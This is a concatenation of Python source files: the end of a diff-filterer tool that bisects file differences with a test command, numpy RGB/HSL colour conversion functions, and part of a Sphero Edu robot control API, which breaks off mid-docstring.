if len(probablyAcceptableStates) > 0 and (len(probablyAcceptableStates) >= len(activeTestStatesById) + 1 or numConsecutiveFailures >= len(activeTestStatesById) or len(activeTestStatesById) < 1):
probablyAcceptableState = FilesState()
for state in probablyAcceptableStates:
probablyAcceptableState = probablyAcceptableState.expandedWithEmptyEntriesFor(state).withConflictsFrom(state)
probablyAcceptableState = probablyAcceptableState.withoutDuplicatesFrom(self.resetTo_state)
if probablyAcceptableState.size() > 0:
print("Retesting " + str(len(probablyAcceptableStates)) + " previous likely successful states as a single test: " + probablyAcceptableState.summarize())
availableTestStates = [probablyAcceptableState] + availableTestStates
probablyAcceptableStates = []
if len(availableTestStates) < 1 and len(activeTestStatesById) < 1:
print("Error: no changes remain left to test. It was expected that applying all changes would fail")
break
# if we haven't checked everything yet, then try to queue more jobs
if numFailuresSinceLastSplitOrSuccess < self.resetTo_state.size():
availableTestStates.sort(reverse=True, key=FilesState.size)
if self.maxNumJobsAtOnce != "auto":
targetNumJobs = self.maxNumJobsAtOnce
else:
# If N jobs are running then wait for all N to fail before increasing the number of running jobs
# Recalibrate the number of processes based on the system load
systemUsageStats = cpuStats.cpu_times_percent()
systemIdleFraction = systemUsageStats.idle / 100
if systemIdleFraction >= 0.5:
if numCompletionsSinceLastPoolSizeChange <= len(activeTestStatesById):
# Not much time has passed since the previous time we changed the pool size
targetNumJobs = len(activeTestStatesById) + 1 # just replace existing job
else:
# We've been using less than the target capacity for a while, so add another job
targetNumJobs = len(activeTestStatesById) + 2 # replace existing job and add a new one
numCompletionsSinceLastPoolSizeChange = 0
else:
targetNumJobs = len(activeTestStatesById) # don't replace existing job
numCompletionsSinceLastPoolSizeChange = 0
if targetNumJobs < 1:
targetNumJobs = 1
print("System idle = " + str(systemIdleFraction) + ", current num jobs = " + str(len(activeTestStatesById) + 1) + ", target num jobs = " + str(targetNumJobs))
if timedOut:
print("Timeout reached, not starting new jobs")
else:
while len(activeTestStatesById) < targetNumJobs and len(activeTestStatesById) < self.resetTo_state.size() and len(availableTestStates) > 0:
# find next pending job
box = availableTestStates[0]
# find next unused job id
jobId = 0
while jobId in activeTestStatesById:
jobId += 1
# start job
workingDir = self.getWorkPath(jobId)
cacheDir = self.getFilesCachePath(jobId)
if jobId in workerStatesById:
workerPreviousState = workerStatesById[jobId]
else:
workerPreviousState = FilesState()
runJobInOtherProcess(self.testScript_path, workingDir, cacheDir, workerPreviousState, self.assumeNoSideEffects, self.full_resetTo_state, box, queue, jobId)
activeTestStatesById[jobId] = box
availableTestStates = availableTestStates[1:]
if timedOut:
wasSuccessful = False
else:
print("double-checking results")
wasSuccessful = True
if not self.runnerTest(filesStateFromTree(self.bestState_path))[0]:
message = "Error: expected best state at " + self.bestState_path + " did not pass the second time. Could the test be non-deterministic?"
if self.assumeNoSideEffects:
message += " (it may help to remove the --assume-no-side-effects flag)"
if self.assumeInputStatesAreCorrect:
message += " (it may help to remove the --assume-input-states-are-correct flag)"
print(message)
wasSuccessful = False
self.cleanupTempDirs()
print("")
if self.targetState.size() < 1000:
filesDescription = str(self.targetState)
else:
filesDescription = str(self.targetState.summarize())
print("Done trying to transform the contents of passing path:\n " + self.originalPassingPath + "\ninto the contents of failing path:\n " + self.originalFailingPath)
print("Of " + str(self.originalNumDifferences) + " differences, could not accept: " + filesDescription)
print("The final accepted state can be seen at " + self.bestState_path)
if timedOut:
print("Note that these results might not be optimal due to reaching the timeout of " + str(self.timeoutSeconds) + " seconds")
return wasSuccessful
def main(args):
assumeNoSideEffects = False
assumeInputStatesAreCorrect = False
workPath = "/tmp/diff-filterer"
timeoutSeconds = None
maxNumJobsAtOnce = 1
while len(args) > 0:
arg = args[0]
if arg == "--assume-no-side-effects":
assumeNoSideEffects = True
args = args[1:]
continue
if arg == "--assume-input-states-are-correct":
assumeInputStatesAreCorrect = True
args = args[1:]
continue
if arg == "--work-path":
if len(args) < 2:
usage()
workPath = args[1]
args = args[2:]
continue
if arg == "--num-jobs":
if len(args) < 2:
usage()
val = args[1]
if val == "auto":
maxNumJobsAtOnce = val
else:
maxNumJobsAtOnce = int(val)
args = args[2:]
continue
if arg == "--timeout":
if len(args) < 2:
usage()
val = args[1]
timeoutSeconds = float(val)
args = args[2:]
continue
if arg == "--debug":
global debug
debug = True
args = args[1:]
continue
if len(arg) > 0 and arg[0] == "-":
print("Unrecognized argument: '" + arg + "'")
usage()
break
if len(args) != 3:
usage()
passingPath = args[0]
failingPath = args[1]
shellCommand = args[2]
startTime = datetime.datetime.now()
if not os.path.exists(passingPath):
print("Specified passing path " + passingPath + " does not exist")
sys.exit(1)
if not os.path.exists(failingPath):
print("Specified failing path " + failingPath + " does not exist")
sys.exit(1)
success = DiffRunner(failingPath, passingPath, shellCommand, workPath, assumeNoSideEffects, assumeInputStatesAreCorrect, maxNumJobsAtOnce, timeoutSeconds).run()
endTime = datetime.datetime.now()
duration = endTime - startTime
if success:
print("Succeeded in " + str(duration))
else:
print("Failed in " + str(duration))
sys.exit(1)
main(sys.argv[1:])
|
__init__.py
|
import numpy as np
import threading
import multiprocessing
import math
def rgb2hsl(rgb):
def core(_rgb, _hsl):
irgb = _rgb.astype(np.uint16)
ir, ig, ib = irgb[:, :, 0], irgb[:, :, 1], irgb[:, :, 2]
h, s, l = _hsl[:, :, 0], _hsl[:, :, 1], _hsl[:, :, 2]
imin, imax = irgb.min(2), irgb.max(2)
iadd, isub = imax + imin, imax - imin
ltop = (iadd != 510) * (iadd > 255)
lbot = (iadd != 0) * (ltop == False)
l[:] = iadd.astype(np.float) / 510
fsub = isub.astype(np.float)
s[ltop] = fsub[ltop] / (510 - iadd[ltop])
s[lbot] = fsub[lbot] / iadd[lbot]
not_same = imax != imin
is_b_max = not_same * (imax == ib)
not_same_not_b_max = not_same * (is_b_max == False)
is_g_max = not_same_not_b_max * (imax == ig)
is_r_max = not_same_not_b_max * (is_g_max == False) * (imax == ir)
h[is_r_max] = ((0. + ig[is_r_max] - ib[is_r_max]) / isub[is_r_max])
h[is_g_max] = ((0. + ib[is_g_max] - ir[is_g_max]) / isub[is_g_max]) + 2
h[is_b_max] = ((0. + ir[is_b_max] - ig[is_b_max]) / isub[is_b_max]) + 4
h[h < 0] += 6
h[:] /= 6
hsl = np.zeros(rgb.shape, dtype=np.float)
cpus = multiprocessing.cpu_count()
length = int(math.ceil(float(hsl.shape[0]) / cpus))
line = 0
threads = []
while line < hsl.shape[0]:
line_next = line + length
thread = threading.Thread(target=core, args=(rgb[line:line_next], hsl[line:line_next]))
thread.start()
threads.append(thread)
line = line_next
for thread in threads:
thread.join()
return hsl
def hsl2rgb(hsl):
def core(_hsl, _frgb):
h, s, l = _hsl[:, :, 0], _hsl[:, :, 1], _hsl[:, :, 2]
fr, fg, fb = _frgb[:, :, 0], _frgb[:, :, 1], _frgb[:, :, 2]
q = np.zeros(l.shape, dtype=np.float)
lbot = l < 0.5
q[lbot] = l[lbot] * (1 + s[lbot])
ltop = lbot == False
l_ltop, s_ltop = l[ltop], s[ltop]
q[ltop] = (l_ltop + s_ltop) - (l_ltop * s_ltop)
p = 2 * l - q
q_sub_p = q - p
is_s_zero = s == 0
l_is_s_zero = l[is_s_zero]
per_3 = 1./3
per_6 = 1./6
two_per_3 = 2./3
def calc_channel(channel, t):
t[t < 0] += 1
t[t > 1] -= 1
t_lt_per_6 = t < per_6
t_lt_half = (t_lt_per_6 == False) * (t < 0.5)
t_lt_two_per_3 = (t_lt_half == False) * (t < two_per_3)
t_mul_6 = t * 6
channel[:] = p.copy()
channel[t_lt_two_per_3] = p[t_lt_two_per_3] + q_sub_p[t_lt_two_per_3] * (4 - t_mul_6[t_lt_two_per_3])
channel[t_lt_half] = q[t_lt_half].copy()
channel[t_lt_per_6] = p[t_lt_per_6] + q_sub_p[t_lt_per_6] * t_mul_6[t_lt_per_6]
channel[is_s_zero] = l_is_s_zero.copy()
calc_channel(fr, h + per_3)
calc_channel(fg, h.copy())
calc_channel(fb, h - per_3)
frgb = np.zeros(hsl.shape, dtype=np.float)
cpus = multiprocessing.cpu_count()
length = int(math.ceil(float(hsl.shape[0]) / cpus))
line = 0
threads = []
while line < hsl.shape[0]:
line_next = line + length
thread = threading.Thread(target=core, args=(hsl[line:line_next], frgb[line:line_next]))
thread.start()
threads.append(thread)
line = line_next
for thread in threads:
thread.join()
return (frgb*255).round().astype(np.uint8)
|
sphero_edu.py
|
import math
import threading
import time
from collections import namedtuple, defaultdict
from enum import Enum, IntEnum, auto
from functools import partial
from typing import Union, Callable, Dict, Iterable
import numpy as np
from transforms3d.euler import euler2mat
from spherov2.commands.animatronic import R2LegActions
from spherov2.commands.io import IO
from spherov2.commands.power import BatteryVoltageAndStateStates
from spherov2.controls import RawMotorModes
from spherov2.helper import bound_value, bound_color
from spherov2.toy import Toy
from spherov2.toy.bb8 import BB8
from spherov2.toy.bb9e import BB9E
from spherov2.toy.bolt import BOLT
from spherov2.toy.mini import Mini
from spherov2.toy.ollie import Ollie
from spherov2.toy.r2d2 import R2D2
from spherov2.toy.r2q5 import R2Q5
from spherov2.toy.rvr import RVR
from spherov2.toy.sphero import Sphero
from spherov2.types import Color
from spherov2.utils import ToyUtil
class Stance(str, Enum):
Bipod = 'twolegs'
Tripod = 'threelegs'
class EventType(Enum):
on_collision = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT, f.Mini]
on_freefall = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT, f.Mini]
on_landing = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT, f.Mini]
on_gyro_max = auto() # [f.Sphero, f.Mini, f.Ollie, f.BB8, f.BB9E, f.BOLT, f.Mini]
on_charging = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT]
on_not_charging = auto() # [f.Sphero, f.Ollie, f.BB8, f.BB9E, f.R2D2, f.R2Q5, f.BOLT]
on_ir_message = auto() # [f.BOLT, f.RVR] TODO
on_color = auto() # [f.RVR] TODO
class LedManager:
def __init__(self, cls):
if cls is RVR:
self.__mapping = {
'front': ('left_headlight', 'right_headlight'),
'main': ('left', 'right', 'front', 'back')
}
elif cls in (R2D2, R2Q5, BOLT):
self.__mapping = {'main': ('front', 'back')}
else:
self.__mapping = {}
self.__leds = defaultdict(partial(Color, 0, 0, 0))
def __setitem__(self, key, value):
if key in self.__mapping:
for led in self.__mapping[key]:
self.__setitem__(led, value)
else:
self.__leds[key] = value
def __getitem__(self, item):
if item in self.__mapping:
return self.__getitem__(self.__mapping[item][0])
return self.__leds[item]
def get(self, item, default):
if item in self.__mapping:
return self.get(self.__mapping[item][0], default)
return self.__leds.get(item, default)
class SpheroEduAPI:
"""Implementation of Sphero Edu Javascript APIs: https://sphero.docsapp.io/docs/get-started"""
def __init__(self, toy: Toy):
self.__toy = toy
self.__heading = 0
self.__speed = 0
self.__stabilization = True
self.__raw_motor = namedtuple('rawMotor', ('left', 'right'))(0, 0)
self.__leds = LedManager(toy.__class__)
self.__sensor_data: Dict[str, Union[float, Dict[str, float]]] = {'distance': 0., 'color_index': -1}
self.__sensor_name_mapping = {}
self.__last_location = (0., 0.)
self.__last_non_fall = time.time()
self.__falling_v = 1.
self.__last_message = None
self.__should_land = self.__free_falling = False
ToyUtil.add_listeners(toy, self)
self.__listeners = defaultdict(set)
self.__stopped = threading.Event()
self.__stopped.set()
self.__updating = threading.Lock()
self.__thread = None
def __enter__(self):
self.__stopped.clear()
self.__thread = threading.Thread(target=self.__background)
self.__toy.__enter__()
self.__thread.start()
try:
self.__toy.wake()
ToyUtil.set_robot_state_on_start(self.__toy)
self.__start_capturing_sensor_data()
except:
self.__exit__(None, None, None)
raise
return self
def __exit__(self, *args):
self.__stopped.set()
self.__thread.join()
try:
ToyUtil.sleep(self.__toy)
except:
pass
self.__toy.__exit__(*args)
def __background(self):
while not self.__stopped.wait(0.8):
with self.__updating:
self.__update_speeds()
def _will_sleep_notify(self):
ToyUtil.ping(self.__toy)
# Movements: control the robot's motors and control system.
def __update_speeds(self):
if self.__speed != 0:
self.__update_speed()
if self.__raw_motor.left != 0 or self.__raw_motor.right != 0:
self.__update_raw_motor()
def __stop_all(self):
if self.__speed != 0:
self.__speed = 0
self.__update_speed()
if self.__raw_motor.left != 0 or self.__raw_motor.right != 0:
self.__raw_motor.left = self.__raw_motor.right = 0
self.__update_raw_motor()
def roll(self, heading: int, speed: int, duration: float):
"""Combines heading(0-360°), speed(-255-255), and duration to make the robot roll with one line of code.
For example, to have the robot roll at 90°, at speed 200 for 2s, use ``roll(90, 200, 2)``"""
if isinstance(self.__toy, Mini) and speed != 0:
speed = round((speed + 126) * 2 / 3) if speed > 0 else round((speed - 126) * 2 / 3)
self.__speed = bound_value(-255, speed, 255)
self.__heading = heading % 360
if speed < 0:
self.__heading = (self.__heading + 180) % 360
self.__update_speed()
time.sleep(duration)
self.stop_roll()
def __update_speed(self):
ToyUtil.roll_start(self.__toy, self.__heading, self.__speed)
def set_speed(self, speed: int):
"""Sets the speed of the robot from -255 to 255, where positive speed is forward, negative speed is backward,
and 0 is stopped. Each robot type translates this value differently into a real world speed;
Ollie is almost three times faster than Sphero. For example, use ``set_speed(188)`` to set the speed to 188
which persists until you set a different speed. You can also read the real-time velocity value in centimeters
per second reported by the motor encoders.
"""
if isinstance(self.__toy, Mini) and speed != 0:
speed = round((speed + 126) * 2 / 3) if speed > 0 else round((speed - 126) * 2 / 3)
self.__speed = bound_value(-255, speed, 255)
self.__update_speed()
def stop_roll(self, heading: int = None):
"""Sets the speed to zero to stop the robot, effectively the same as the ``set_speed(0)`` command."""
if heading is not None:
self.__heading = heading % 360
self.__speed = 0
ToyUtil.roll_stop(self.__toy, self.__heading, False)
def set_heading(self, heading: int):
"""Sets the direction the robot rolls.
Assuming you aim the robot with the blue tail light facing you, then 0° is forward, 90° is right,
270° is left, and 180° is backward. For example, use ``set_heading(90)`` to face right."""
self.__heading = heading % 360
ToyUtil.roll_start(self.__toy, self.__heading, self.__speed)
def spin(self, angle: int, duration: float):
"""Spins the robot for a given number of degrees over time, with 360° being a single revolution.
For example, to spin the robot 360° over 1s, use: ``spin(360, 1)``.
Use :func:`set_speed` prior to :func:`spin` to have the robot move in circle or an arc or circle.
Note: Unlike official API, performance of spin is guaranteed, but may be longer than the specified duration."""
if angle == 0:
return
time_pre_rev = .45
if isinstance(self.__toy, RVR):
time_pre_rev = 1.5
elif isinstance(self.__toy, (R2D2, R2Q5)):
time_pre_rev = .7
elif isinstance(self.__toy, Mini):
time_pre_rev = .5
elif isinstance(self.__toy, Ollie):
time_pre_rev = .6
abs_angle = abs(angle)
duration = max(duration, time_pre_rev * abs_angle / 360)
start = time.time()
angle_gone = 0
with self.__updating:
while angle_gone < abs_angle:
delta = round(min((time.time() - start) / duration, 1.) * abs_angle) - angle_gone
self.set_heading(self.__heading + delta if angle > 0 else self.__heading - delta)
angle_gone += delta
def set_stabilization(self, stabilize: bool):
"""Turns the stabilization system on and ``set_stabilization(false)`` turns it off.
Stabilization is normally on to keep the robot upright using the Inertial Measurement Unit (IMU),
a combination of readings from the Accelerometer (directional acceleration), Gyroscope (rotation speed),
and Encoders (location and distance). When ``set_stabilization(false)`` and you power the motors,
the robot will not balance, resulting in possible unstable behaviors like wobbly driving,
or even jumping if you set the power very high. Some use cases to turn it off are:
1. Jumping: Set Motor Power to max values and the robot will jump off the ground!
2. Gyro: Programs like the Spinning Top where you want to to isolate the Gyroscope readings rather than having
the robot auto balance inside the shell.
When stabilization is off you can't use :func:`set_speed` to set a speed because it requires the control system
to be on to function. However, you can control the motors using Motor Power with :func:`raw_motor` when
the control system is off."""
self.__stabilization = stabilize
if isinstance(self.__toy, (Sphero, Mini, Ollie, BB8, BB9E, BOLT)):
ToyUtil.set_stabilization(self.__toy, stabilize)
def __update_raw_motor(self):
ToyUtil.set_raw_motor(self.__toy,
RawMotorModes.REVERSE if self.__raw_motor.left < 0 else RawMotorModes.FORWARD,
abs(self.__raw_motor.left),
RawMotorModes.REVERSE if self.__raw_motor.right < 0 else RawMotorModes.FORWARD,
abs(self.__raw_motor.right))
def raw_motor(self, left: int, right: int, duration: float):
"""Controls the electrical power sent to the left and right motors independently, on a scale from -255 to 255
where positive is forward, negative is backward, and 0 is stopped. If you set both motors to full power
the robot will jump because stabilization (use of the IMU to keep the robot upright) is disabled when using
this command. This is different from :func:`set_speed` because Raw Motor sends an "Electromotive force"
to the motors, whereas Set Speed is a target speed measured by the encoders. For example, to set the raw motor
to full power for 4s, making the robot jump off the ground, use ``raw_motor(255, 255, 4)``."""
stabilize = self.__stabilization
if stabilize:
self.set_stabilization(False)
self.__raw_motor.left = bound_value(-255, left, 255)
self.__raw_motor.right = bound_value(-255, right, 255)
self.__update_raw_motor()
if duration is not None:
time.sleep(duration)
if stabilize:
self.set_stabilization(True)
self.__raw_motor.left = self.__raw_motor.right = 0
ToyUtil.set_raw_motor(self.__toy, RawMotorModes.OFF, 0, RawMotorModes.OFF, 0)
def reset_aim(self):
"""Resets the heading calibration (aim) angle to use the current direction of the robot as 0°."""
ToyUtil.reset_heading(self.__toy)
# Star Wars Droid Movements
def play_animation(self, animation: IntEnum):
"""Plays iconic `Star Wars Droid animations <https://edu.sphero.com/remixes/1195472/>`_ unique to BB-8, BB-9E,
R2-D2 and R2-Q5 that combine movement, lights and sound. All animation enums can be accessed under the droid
class, such as :class:`R2D2.Animations.CHARGER_1`."""
if hasattr(self.__toy, 'Animations'):
if animation not in self.__toy.Animations:
raise ValueError(f'Animation {animation} cannot be played by this toy')
with self.__updating:
self.__stop_all()
ToyUtil.play_animation(self.__toy, animation, True)
# The R2-D2 and R2-Q5 Droids are physically different from other Sphero robots,
# so there are some unique commands that only they can use.
def set_dome_position(self, angle: float):
"""Rotates the dome on its axis, from -160° to 180°. For example, set to 45° using ``set_dome_position(45).``"""
if isinstance(self.__toy, (R2D2, R2Q5)):
ToyUtil.set_head_position(self.__toy, bound_value(-160., angle, 180.))
def set_stance(self, stance: Stance):
"""Changes the stance between bipod and tripod. Set to bipod using ``set_stance(Stance.Bipod)`` and
to tripod using ``set_stance(Stance.Tripod)``. Tripod is required for rolling."""
if isinstance(self.__toy, (R2D2, R2Q5)):
if stance == Stance.Bipod:
ToyUtil.perform_leg_action(self.__toy, R2LegActions.TWO_LEGS)
elif stance == Stance.Tripod:
ToyUtil.perform_leg_action(self.__toy, R2LegActions.THREE_LEGS)
else:
raise ValueError(f'Stance {stance} is not supported')
def set_waddle(self, waddle: bool):
"""Turns the waddle walk on using `set_waddle(True)`` and off using ``set_waddle(False)``."""
if isinstance(self.__toy, (R2D2, R2Q5)):
with self.__updating:
self.__stop_all()
ToyUtil.perform_leg_action(self.__toy, R2LegActions.WADDLE if waddle else R2LegActions.STOP)
# Lights: control the color and brightness of LEDs on a robot.
def set_main_led(self, color: Color):
"""Changes the color of the main LED light, or the full matrix on Sphero BOLT. Set this using RGB
(red, green, blue) values on a scale of 0 - 255. For example, ``set_main_led(Color(r=90, g=255, b=90))``."""
self.__leds['main'] = bound_color(color, self.__leds['main'])
ToyUtil.set_main_led(self.__toy, **self.__leds['main']._asdict(), is_user_color=False)
def set_front_led(self, color: Color):
"""For Sphero RVR: Changes the color of RVR's front two LED headlights together.
For Sphero BOLT, R2D2, R2Q5: Changes the color of the front LED light.
Set this using RGB (red, green, blue) values on a scale of 0 - 255. For example, the magenta color is expressed
as ``set_front_color(Color(239, 0, 255))``."""
if isinstance(self.__toy, (R2D2, R2Q5, BOLT, RVR)):
self.__leds['front'] = bound_color(color, self.__leds['front'])
ToyUtil.set_front_led(self.__toy, **self.__leds['front']._asdict())
def set_back_led(self, color: Union[Color, int]):
"""For older Sphero:
Sets the brightness of the back aiming LED, aka the "Tail Light." This LED is limited to blue only, with a
brightness scale from 0 to 255. For example, use ``set_back_led(255)`` to set the back LED to full brightness.
Use :func:`time.sleep` to set it on for a duration. For example, to create a dim and a bright blink
sequence use::
set_back_led(0) # Dim
delay(0.33)
set_back_led(255) # Bright
delay(0.33)
For Sphero BOLT, R2D2, R2Q5:
Changes the color of the back LED light. Set this using RGB (red, green, blue) values on a scale of 0 - 255.
For Sphero RVR:
Changes the color of the left and right breaklight LED light. Set this using RGB (red, green, blue) values
on a scale of 0 - 255."""
if isinstance(color, int):
self.__leds['back'] = Color(0, 0, bound_value(0, color, 255))
ToyUtil.set_back_led_brightness(self.__toy, self.__leds['back'].b)
elif isinstance(self.__toy, (R2D2, R2Q5, BOLT, RVR)):
self.__leds['back'] = bound_color(color, self.__leds['back'])
ToyUtil.set_back_led(self.__toy, **self.__leds['back']._asdict())
def fade(self, from_color: Color, to_color: Color, duration: float):
"""Changes the main LED lights from one color to another over a period of seconds. For example, to fade from
green to blue over 3s, use: ``fade(Color(0, 255, 0), Color(0, 0, 255), 3.0)``."""
from_color = bound_color(from_color, self.__leds['main'])
to_color = bound_color(to_color, self.__leds['main'])
start = time.time()
while True:
frac = (time.time() - start) / duration
if frac >= 1:
break
self.set_main_led(Color(
r=round(from_color.r * (1 - frac) + to_color.r * frac),
g=round(from_color.g * (1 - frac) + to_color.g * frac),
b=round(from_color.b * (1 - frac) + to_color.b * frac)))
self.set_main_led(to_color)
def strobe(self, color: Color, period: float, count: int):
"""Repeatedly blinks the main LED lights. The period is the time, in seconds, the light stays on during a
single blink; cycles is the total number of blinks. The time for a single cycle is twice the period
(time for a blink plus the same amount of time for the light to be off). Another way to say this is the period
is 1/2 the time it takes for a single cycle. So, to strobe red 15 times in 3 seconds, use:
``strobe(Color(255, 57, 66), (3 / 15) * .5, 15)``."""
for i in range(count * 2):
if i & 1:
self.set_main_led(color)
else:
self.set_main_led(Color(0, 0, 0))
time.sleep(period)
# TODO Sphero BOLT Lights
# Sphero RVR Lights
def set_left_headlight_led(self, color: Color):
"""Changes the color of the front left headlight LED on RVR. Set this using RGB (red, green, blue) values on a
scale of 0 - 255. For example, the pink color is expressed as
``set_left_headlight_led(Color(253, 159, 255))``."""
if isinstance(self.__toy, RVR):
self.__leds['left_headlight'] = bound_color(color, self.__leds['left_headlight'])
ToyUtil.set_left_front_led(self.__toy, **self.__leds['left_headlight']._asdict())
def set_right_headlight_led(self, color: Color):
"""Changes the color of the front right headlight LED on RVR. Set this using RGB (red, green, blue) values on a
scale of 0 - 255. For example, the blue color is expressed as
``set_right_headlight_led(0, 28, 255)``."""
if isinstance(self.__toy, RVR):
self.__leds['right_headlight'] = bound_color(color, self.__leds['right_headlight'])
ToyUtil.set_right_front_led(self.__toy, **self.__leds['right_headlight']._asdict())
def set_left_led(self, color: Color):
"""Changes the color of the LED on RVR's left side (which is the side with RVR's battery bay door). Set this
using RGB (red, green, blue) values on a scale of 0 - 255. For example, the green color is expressed as
``set_left_led(Color(0, 255, 34))``."""
if isinstance(self.__toy, RVR):
self.__leds['left'] = bound_color(color, self.__leds['left'])
ToyUtil.set_battery_side_led(self.__toy, **self.__leds['left']._asdict())
def set_right_led(self, color: Color):
"""Changes the color of the LED on RVR's right side (which is the side with RVR's power button). Set this using
RGB (red, green, blue) values on a scale of 0 - 255. For example, the red color is expressed as
``set_right_led(Color(255, 18, 0))``."""
if isinstance(self.__toy, RVR):
self.__leds['right'] = bound_color(color, self.__leds['right'])
ToyUtil.set_power_side_led(self.__toy, **self.__leds['right']._asdict())
# BB-9E Lights
def set_dome_leds(self, brightness: int):
"""Controls the brightness of the two single color LEDs (red and blue) in the dome, from 0 to 15. We don't use
0-255 for this light because it has less granular control. For example, set them to full brightness using
``set_dome_leds(15)``."""
if isinstance(self.__toy, BB9E):
self.__leds['dome'] = bound_value(0, brightness, 15)
ranged = self.__leds['dome'] * 255 // 15
ToyUtil.set_head_led(self.__toy, ranged)
# R2-D2 & R2-Q5 Lights
def set_holo_projector_led(self, brightness: int):
"""Changes the brightness of the Holographic Projector white LED, from 0 to 255. For example, set it to full
brightness using ``set_holo_projector_led(255)``."""
if isinstance(self.__toy, (R2D2, R2Q5)):
self.__leds['holo_projector'] = bound_value(0, brightness, 255)
ToyUtil.set_holo_projector(self.__toy, self.__leds['holo_projector'])
def set_logic_display_leds(self, brightness: int):
"""Changes the brightness of the Logic Display LEDs, from 0 to 255. For example, set it to full brightness
using ``set_logic_display_leds(255)``."""
if isinstance(self.__toy, (R2D2, R2Q5)):
self.__leds['logic_display'] = bound_value(0, brightness, 255)
ToyUtil.set_logic_display(self.__toy, self.__leds['logic_display'])
# Sounds: Control sounds and words which can play from your programming device's speaker or the robot.
def play_sound(self, sound: IntEnum):
"""Unique Star Wars Droid Sounds are available for BB-8, BB-9E and R2-D2. For example, to play the R2-D2 Burnout
sound use ``play_sound(R2D2.Audio.R2_BURNOUT)``."""
if hasattr(self.__toy, 'Audio'):
if sound not in self.__toy.Audio:
raise ValueError(f'Sound {sound} cannot be played by this toy')
ToyUtil.play_sound(self.__toy, sound, False)
# Sensors: Querying sensor data allows you to react to real-time values coming from the robots' physical sensors.
def __start_capturing_sensor_data(self):
if isinstance(self.__toy, RVR):
sensors = ['accelerometer', 'gyroscope', 'imu', 'locator', 'velocity', 'ambient_light', 'color_detection']
self.__sensor_name_mapping['imu'] = 'attitude'
elif isinstance(self.__toy, BOLT):
sensors = ['accelerometer', 'gyroscope', 'attitude', 'locator', 'velocity', 'ambient_light']
else:
sensors = ['attitude', 'accelerometer', 'gyroscope', 'locator', 'velocity']
ToyUtil.enable_sensors(self.__toy, sensors)
def _sensor_data_listener(self, sensor_data: Dict[str, Dict[str, float]]):
for sensor, data in sensor_data.items():
if sensor in self.__sensor_name_mapping:
self.__sensor_data[self.__sensor_name_mapping[sensor]] = data
else:
self.__sensor_data[sensor] = data
if 'attitude' in self.__sensor_data and 'accelerometer' in self.__sensor_data:
att = self.__sensor_data['attitude']
r = euler2mat(*np.deg2rad((att['roll'], att['pitch'], att['yaw'])), axes='szxy')
acc = self.__sensor_data['accelerometer']
self.__sensor_data['vertical_accel'] = -np.matmul(np.linalg.inv(r), (acc['x'], -acc['z'], acc['y']))[1]
self.__process_falling(self.__sensor_data['vertical_accel'])
if 'locator' in self.__sensor_data:
cur_loc = self.__sensor_data['locator']
cur_loc = (cur_loc['x'], cur_loc['y'])
self.__sensor_data['distance'] += math.hypot(cur_loc[0] - self.__last_location[0],
cur_loc[1] - self.__last_location[1])
self.__last_location = cur_loc
if 'color_detection' in self.__sensor_data:
color = self.__sensor_data['color_detection']
index = color['index']
if index != self.__sensor_data['color_index'] and index < 255 and color['confidence'] >= 0.71:
self.__sensor_data['color_index'] = index
self.__call_event_listener(EventType.on_color, Color(int(color['r']), int(color['g']), int(color['b'])))
def __process_falling(self, a):
self.__falling_v = (self.__falling_v + a * 3) / 4
cur = time.time()
if -.5 < self.__falling_v < .5 if self.__stabilization else -.1 < a < .1:
if cur - self.__last_non_fall > .2 and not self.__free_falling:
self.__call_event_listener(EventType.on_freefall)
self.__free_falling = True
self.__should_land = True
else:
self.__last_non_fall = cur
self.__free_falling = False
if self.__should_land and (
self.__falling_v < -1.1 or self.__falling_v > 1.1 if self.__stabilization else a < -.8 or a > -.8):
self.__call_event_listener(EventType.on_landing)
self.__should_land = False
def _collision_detected_notify(self, args):
self.__call_event_listener(EventType.on_collision)
def _battery_state_changed_notify(self, state: BatteryVoltageAndStateStates):
if state == BatteryVoltageAndStateStates.CHARGED or state == BatteryVoltageAndStateStates.CHARGING:
self.__call_event_listener(EventType.on_charging)
else:
self.__call_event_listener(EventType.on_not_charging)
def _gyro_max_notify(self, flags):
self.__call_event_listener(EventType.on_gyro_max)
def get_acceleration(self):
"""Provides motion acceleration data along a given axis measured by the Accelerometer, in g's, where g =
9.80665 m/s^2.
``get_acceleration()['x']`` is the left-to-right acceleration, from -8 to 8 g's.
``get_acceleration()['y']`` is the forward-to-back acceleration, from of -8 to 8 g's.
``get_acceleration()['z']`` is the upward-to-downward acceleration, from -8 to 8 g's."""
return self.__sensor_data.get('accelerometer', None)
def get_vertical_acceleration(self):
"""This is the upward or downward acceleration regardless of the robot's orientation, from -8 to 8 g's."""
return self.__sensor_data.get('vertical_accel', None)
def get_orientation(self):
"""Provides the tilt angle along a given axis measured by the Gyroscope, in degrees.
``get_orientation()['pitch']`` is the forward or backward tilt angle, from -180° to 180°.
``get_orientation()['roll']`` is left or right tilt angle, from -90° to 90°.
``get_orientation()['yaw']`` is the spin (twist) angle, from -180° to 180°."""
return self.__sensor_data.get('attitude', None)
def get_gyroscope(self):
"""Provides the rate of rotation around a given axis measured by the gyroscope, from -2,000° to 2,000°
per second.
``get_gyroscope().['pitch']`` is the rate of forward or backward spin, from -2,000° to 2,000° per second.
``get_gyroscope().['roll']`` is the rate of left or right spin, from -2,000° to 2,000° per second.
``get_gyroscope().['yaw']`` is the rate of sideways spin, from -2,000° to 2,000° per second."""
return self.__sensor_data.get('gyroscope', None)
def get_velocity(self):
"""Provides the velocity along a given axis measured by the motor encoders, in centimeters per second.
``get_velocity()['x']`` is the right (+) or left (-) velocity, in centimeters per second.
``get_velocity()['y']`` is the forward (+) or back (-) velocity, in centimeters per second."""
return self.__sensor_data.get('velocity', None)
def get_location(self):
"""Provides the location where the robot is in space (x,y) relative to the origin, in centimeters. This is not
the distance traveled during the program, it is the offset from the origin (program start).
``get_location()['x']`` is the right (+) or left (-) distance from the origin of the program start, in
centimeters.
``get_location()['y']`` is the forward (+) or backward (-) distance from the origin of the program start, in
centimeters."""
return self.__sensor_data.get('locator', None)
def get_distance(self):
"""Provides the total distance traveled in the program, in centimeters."""
return self.__sensor_data.get('distance', None)
def get_speed(self):
"""Provides the current target speed of the robot, from -255 to 255, where positive is forward, negative is
